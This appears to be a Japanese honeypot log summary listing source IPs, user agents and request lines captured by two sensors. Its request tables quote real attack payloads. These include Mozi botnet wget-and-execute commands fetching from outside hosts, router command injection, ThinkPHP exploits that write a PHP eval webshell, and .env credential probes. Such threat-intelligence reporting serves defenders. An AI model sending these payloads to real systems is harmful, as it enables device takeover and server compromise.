1 | 42.226.88.29 | China |
1 | 45.32.239.166 | United States |
1 | 45.33.80.243 | United States |
1 | 45.61.187.252 | United States |
1 | 45.79.172.21 | United States |
1 | 45.79.181.94 | United States |
2 | 45.79.181.104 | United States |
1 | 45.79.181.179 | United States |
1 | 45.81.243.34 | Bulgaria |
1 | 45.128.232.149 | Bulgaria |
1 | 47.100.179.13 | China |
28 | 51.79.29.48 | Canada |
1 | 66.240.192.82 | United States |
2 | 74.82.47.5 | United States |
4 | 89.169.19.202 | Russia |
1 | 91.223.227.140 | Ukraine |
7 | 95.214.235.216 | Ukraine |
1 | 117.194.151.238 | India |
1 | 121.173.126.140 | South Korea |
4 | 128.14.229.186 | United States |
1 | 159.203.208.19 | United States |
2 | 162.142.125.121 | United States |
5 | 165.227.43.0 | United States |
2 | 167.94.146.60 | United States |
1 | 172.104.11.4 | United States |
1 | 172.104.11.46 | United States |
2 | 172.104.11.51 | United States |
1 | 172.105.128.11 | United States |
3 | 185.180.143.80 | Portugal |
8 | 185.254.196.223 | Ukraine |
1 | 192.155.90.220 | United States |
1 | 192.241.231.20 | United States |
10 | 193.32.162.159 | Romania |
1 | 194.55.224.203 | Bulgaria |
1 | 194.87.151.116 | Czechia |
1 | 196.191.132.254 | Ethiopia |
1 | 198.199.109.43 | United States |
1 | 198.235.24.28 | United States |
1 | 205.210.31.17 | United States |
1 | 222.185.185.84 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
30 | - |
3 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 |
43 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
2 | Mozilla/5.0 zgrab/0.x |
2 | Mozilla/5.0 |
4 | Xenu Link Sleuth/1.3.8 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ |
HTTP/1.0 | |
1 | MGLNDD_132.145.66.34_80\n |
||
1 | SSH-2.0-libssh2_1.10.0 |
||
1 | \x16\x03\x01\x01\t\x01 |
||
18 | \x16\x03\x01 |
||
1 | CONNECT | www[.]coupang[.]com:80 |
HTTP/1.1 |
44 | GET | /.env |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /admin/ |
HTTP/1.1 |
1 | GET | /client/get_targets |
HTTP/1.1 |
10 | GET | /dispatch.asp |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]194[.]151[.]238:56864/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws |
|
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+45[.]81[.]243[.]34/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
4 | GET | /status |
HTTP/1.1 |
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | HEAD | /.env |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.0 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh |
HTTP/1.1 |
2 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.55.53.144 | United States |
2 | 35.199.37.81 | United States |
1 | 43.129.81.205 | Singapore |
11 | 44.211.228.198 | United States |
1 | 45.56.108.128 | United States |
1 | 45.61.187.252 | United States |
1 | 45.79.128.205 | United States |
1 | 45.79.181.94 | United States |
1 | 45.79.181.179 | United States |
1 | 45.79.181.223 | United States |
2 | 45.79.181.251 | United States |
24 | 54.37.79.75 | France |
1 | 60.188.209.254 | China |
1 | 64.62.197.188 | United States |
1 | 64.62.197.189 | United States |
1 | 87.251.64.11 | Russia |
1 | 95.215.85.90 | Russia |
1 | 107.170.227.14 | United States |
2 | 109.237.97.180 | Russia |
2 | 109.237.98.226 | Russia |
25 | 113.88.167.191 | China |
1 | 117.194.151.95 | India |
1 | 118.193.45.5 | Hong Kong |
1 | 128.14.134.134 | United States |
1 | 140.99.219.26 | United States |
1 | 152.89.196.54 | Russia |
4 | 159.223.225.97 | United States |
2 | 162.142.125.225 | United States |
1 | 172.104.11.4 | United States |
1 | 172.104.11.34 | United States |
2 | 172.104.11.46 | United States |
1 | 172.104.11.51 | United States |
1 | 172.105.128.12 | United States |
1 | 192.241.222.29 | United States |
8 | 193.32.162.159 | Romania |
1 | 194.55.224.203 | Bulgaria |
1 | 194.87.151.116 | Czechia |
2 | 194.110.203.85 | private ip address |
2 | 205.210.31.158 | United States |
1 | 223.130.29.12 | India |
UserAgent一覧
件数 | UserAgent |
---|---|
34 | - |
1 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 |
8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
26 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http[:]//www[.]google[.]com/bot.html) |
25 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) |
1 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - |
||
1 | MGLNDD_13.67.44.234_80 |
||
1 | \x03 |
||
2 | \x16\x03\x01\x01H\x01 |
||
22 | \x16\x03\x01 |
||
26 | GET | /.env |
HTTP/1.1 |
1 | GET | /99vt |
HTTP/1.1 |
1 | GET | /99vu |
HTTP/1.1 |
1 | GET | /FX8KP0j2D1tCh45L7lG9zvoqRMD |
HTTP/1.1 |
1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau |
HTTP/1.1 |
1 | GET | /aaaaaaaaaaaaaaaaaaaaaaaaaqr |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
1 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /dashboard.action |
HTTP/1.1 |
8 | GET | /dispatch.asp |
HTTP/1.1 |
3 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /gate.php |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=spread.php&vars%5B1%5D%5B%5D=%3C?php%20@eval($_POST%5Bspread%5D);?%3E |
HTTP/1.1 |
1 | GET | /index.php/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%3C?php%20@eval($_POST%5Bspread%5D);?%3E%20%3E%3Espread.php |
HTTP/1.1 |
1 | GET | /index.php/?s=index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%3C?php%20@eval($_POST%5Bspread%5D);?%3E%20%3E%3Espread.php |
HTTP/1.1 |
1 | GET | /index.php/?s=index/%5Cthink%5CRequest/input&filter=system&data=echo%20%3C?php%20@eval($_POST%5Bspread%5D);?%3E%20%3E%3Espread.php |
HTTP/1.1 |
1 | GET | /index.php/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=spread.php&content=%3C?php%20@eval($_POST%5Bspread%5D);?%3E |
HTTP/1.1 |
1 | GET | /index.php/?s=index/%5Cthink%5Cview%5Cdriver%5CPhp/display&content=echo%20%3C?php%20@eval($_POST%5Bspread%5D);?%3E%20%3E%3Espread.php |
HTTP/1.1 |
1 | GET | /index.php?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('spread.php','%3C?php%20@eval($_POST%5Bspread%5D);?%3E') |
HTTP/1.1 |
1 | GET | /index.php |
HTTP/1.1 |
1 | GET | /login.action |
HTTP/1.1 |
1 | GET | /login.do |
HTTP/1.1 |
1 | GET | /login_login.action |
HTTP/1.1 |
4 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/text/list |
HTTP/1.1 |
1 | GET | /news.action |
HTTP/1.1 |
3 | GET | /public/index.php |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//60[.]188[.]209[.]254:34770/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
3 | GET | /spread.php |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /verifylogin.do |
HTTP/1.1 |
1 | GET | http[:]//azenv[.]net/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.1 |
1 | OPTIONS | / |
HTTP/1.0 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh |
HTTP/1.1 |
2 | POST | /index.php/?s=captcha |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |